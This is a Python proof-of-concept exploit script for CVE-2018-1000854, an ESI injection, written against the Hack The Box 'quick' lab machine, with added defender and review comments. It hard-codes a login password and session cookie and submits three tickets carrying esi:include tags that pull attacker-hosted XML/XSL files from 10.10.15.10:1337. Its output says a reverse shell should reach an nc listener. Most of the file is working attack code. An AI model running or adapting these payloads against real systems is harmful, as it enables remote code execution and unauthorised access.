#!/usr/bin/env python3
#coding: utf8
#Created by zweilosec (WolfZweiler) for CVE-2018-1000854 (as exposed in HTB - quick)
import requests
from bs4 import BeautifulSoup
import time
import sys
# Proof-of-concept driver for CVE-2018-1000854 (ESI injection) as used on the
# HTB "quick" lab host.  Flow, as written below: one POST to login.php, then
# three POSTs to ticket.php whose `msg` field carries an `<esi:include>` tag,
# each followed by a GET of search.php for the ticket just created.  Every
# request reuses the same hard-coded PHPSESSID cookie (see the TODO after the
# login headers), so the script depends on a session obtained out of band.
#
# Defender notes: the weakness exercised here is user-controlled ticket text
# reaching an ESI processor unescaped.  The fix is to neutralise `<esi:` tags
# in user-supplied content (or disable ESI processing for those responses) and
# to restrict where the processor may fetch `src`/`stylesheet` URLs from.
# Indicators worth alerting on: `<esi:include` in submitted ticket fields, and
# outbound fetches from the application host for .xml/.xsl resources it does
# not normally request.
login_url = "http://quick.htb:9001/login.php"
# NOTE(review): the field name before "@" has been lost -- the page's e-mail
# obfuscation rewrote it as "[email protected]"; the original presumably read
# "email=<user>@<host>".  Confirm against the upstream file.  The password is
# stored here in plaintext.
login_data = '[email protected]&password=Quick4cc3$$'
# Browser-like headers for the login POST.  The Cookie is a fixed PHPSESSID,
# not one issued by the server for this run.
login_headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Cookie': 'PHPSESSID=03u65s156tk17dfddsi28m7rld',
    'Referer': 'http://quick.htb:9001/login.php',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Host': 'quick.htb:9001'}
#TODO: Get headers from an initial GET request so have accurate PHPSESSID (not hard-coded)
ticket_url = "http://quick.htb:9001/ticket.php"
# Same fixed session cookie as above; only Referer/Host ordering differs.
ticket_headers = {
    'Host': 'quick.htb:9001',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://quick.htb:9001/ticket.php',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': 'PHPSESSID=03u65s156tk17dfddsi28m7rld'}
# Ticket form bodies.  `msg` holds the ESI tag; its `src` and `stylesheet`
# point at a separately hosted .xml/.xsl pair (the TODOs at the bottom say
# these are served by an external SimpleHTTPServer).  `id` is the ticket
# identifier that the matching search URL below looks up by its numeric
# suffix (TKT-1234 -> search=1234, and so on).
esi1 = 'title=evil&msg="<esi:include src="http://10.10.15.10:1337/evil.xml" stylesheet="http://10.10.15.10:1337/evil.xsl"></esi:include>"&id=TKT-1234'
esi2 = 'title=evil1&msg="<esi:include src="http://10.10.15.10:1337/evil1.xml" stylesheet="http://10.10.15.10:1337/evil1.xsl"></esi:include>"&id=TKT-2345'
esi3 = 'title=evil2&msg="<esi:include src="http://10.10.15.10:1337/evil2.xml" stylesheet="http://10.10.15.10:1337/evil2.xsl"></esi:include>"&id=TKT-3456'
ticGet1_url = 'http://quick.htb:9001/search.php?search=1234'
ticGet2_url = 'http://quick.htb:9001/search.php?search=2345'
ticGet3_url = 'http://quick.htb:9001/search.php?search=3456'
# Headers for the search GETs; presumably this is the request that renders the
# stored ticket (and therefore the ESI tag) -- the script never inspects the
# responses, so that is an inference.  Same fixed session cookie.
ticGet_headers = {
    'Host': 'quick.htb:9001',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://quick.htb:9001/home.php',
    'X-Requested-With': 'XMLHttpRequest',
    'Connection': 'close',
    'Cookie': 'PHPSESSID=03u65s156tk17dfddsi28m7rld',
    'DNT': '1'}
# Pre-bound so the later `.status_code` checks reference defined names; in
# practice each failure branch calls sys.exit() before the next check runs.
esi1_r, esi2_r, esi3_r = None, None, None
login_r = requests.post(login_url, headers = login_headers, data = login_data)
#login_r.status_code should be == 302, however this login request is not working correctly
#need to further troubleshoot; for now bypassed by logging in with burp
# Only a 200 is treated as success.  Per the note above, a real login answers
# with a 302, so a working login would fall into the failure branch here;
# the hard-coded cookie is what actually carries the session.
if login_r.status_code == 200:
    print("Login successful!\n")
    esi1_r = requests.post(ticket_url, headers = ticket_headers, data = esi1)
    # The sleeps are a fixed delay between requests; presumably to let the
    # server store/render the ticket -- no response field is checked for it.
    time.sleep(1)
    ticGet1_r = requests.get(ticGet1_url, headers = ticGet_headers)
    time.sleep(1)
else:
    print("The request failed with status code: " + str(login_r.status_code))
    print("Did not login successfully :(\n")
    print("Dumping response text:\n\n")
    print(login_r.text)
    # sys.exit() with no argument exits with status 0, so a caller cannot
    # distinguish this failure from success by exit code.
    sys.exit()
# Second ticket; same 200-only success test and the same exit-0-on-failure.
if esi1_r.status_code == 200:
    print("Evil1 upload successful!\n")
    esi2_r = requests.post(ticket_url, headers = ticket_headers, data = esi2)
    time.sleep(1)
    ticGet2_r = requests.get(ticGet2_url, headers = ticGet_headers)
    time.sleep(1)
else:
    print("The request failed with status code: " + str(esi1_r.status_code))
    print("Did not upload evil1 successfully :(\n")
    sys.exit()
# Third ticket.  Note the search GET is not followed by a sleep here.
if esi2_r.status_code == 200:
    print("Evil2 upload successful!\n")
    esi3_r = requests.post(ticket_url, headers = ticket_headers, data = esi3)
    time.sleep(1)
    ticGet3_r = requests.get(ticGet3_url, headers = ticGet_headers)
else:
    print("The request failed with status code: " + str(esi2_r.status_code))
    print("Did not upload evil2 successfully :(\n")
    sys.exit()
# Final status report.  The script opens no listener of its own (see the last
# TODO); "successful" here only means the ticket POST returned 200, and the
# ticGet*_r responses are never examined.
if esi3_r.status_code == 200:
    print("Evil3 upload successful!\n")
    print("Check your nc listener...shell should be inbound!\n")
else:
    print("The request failed with status code: " + str(esi3_r.status_code))
    print("Did not upload evil3 successfully :(\n")
#TODO: generalize urls and other data to be used other than in HTB; perhaps take as input arguments URL, PORT, USER, PASS, Commands to be run (foreach type loop)...
#TODO: exception handling
#TODO: instead of separate SimpleHTTPServer hosting different files, do in-script
#TODO: instead of nc listener in terminal, implement in-script